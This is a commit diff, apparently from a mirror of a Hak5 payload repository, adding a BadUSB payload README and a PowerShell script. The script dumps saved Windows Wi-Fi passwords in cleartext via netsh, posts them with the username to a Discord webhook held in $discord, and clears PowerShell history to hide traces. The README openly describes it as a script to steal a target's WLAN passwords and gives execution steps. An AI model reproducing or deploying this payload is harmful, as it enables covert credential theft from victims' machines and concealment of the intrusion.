mirror of https://github.com/hak5/omg-payloads.git
readme
parent
aaf34c1130
commit
2f8f774346
|
@ -0,0 +1,26 @@
|
|||
# WLAN Windows Password - BADUSB ✅
|
||||
|
||||
A script used to stole target WLAN Passwords.
|
||||
|
||||
**Category**: WLAN, Credentials
|
||||
|
||||
## Description
|
||||
|
||||
A script used to stole target WLAN Passwords.
|
||||
|
||||
Opens PowerShell hidden, grabs wlan passwords, saves as a cleartext in a variable and exfiltrates info via Discord Webhook.
|
||||
|
||||
Then it cleans up traces of what you have done after.
|
||||
|
||||
## Getting Started
|
||||
|
||||
### Dependencies
|
||||
|
||||
* An internet connection
|
||||
* Windows 10,11
|
||||
|
||||
### Executing program
|
||||
|
||||
* Plug in your device
|
||||
* Invoke 2 netsh commands
|
||||
* Invoke-WebRequest will be entered in the Run Box to send the content
|
|
@ -0,0 +1,16 @@
|
|||
|
||||
# ENG
|
||||
netsh wlan show profile | Select-String '(?<=All User Profile\s+:\s).+' | ForEach-Object {
|
||||
$wlan = $_.Matches.Value
|
||||
$passw = netsh wlan show profile $wlan key=clear | Select-String '(?<=Key Content\s+:\s).+'
|
||||
|
||||
$Body = @{
|
||||
'username' = $env:username + " | " + [string]$wlan
|
||||
'content' = [string]$passw
|
||||
}
|
||||
|
||||
Invoke-RestMethod -ContentType 'Application/Json' -Uri $discord -Method Post -Body ($Body | ConvertTo-Json)
|
||||
}
|
||||
|
||||
# Clear the PowerShell command history
|
||||
Clear-History
|
Loading…
Reference in New Issue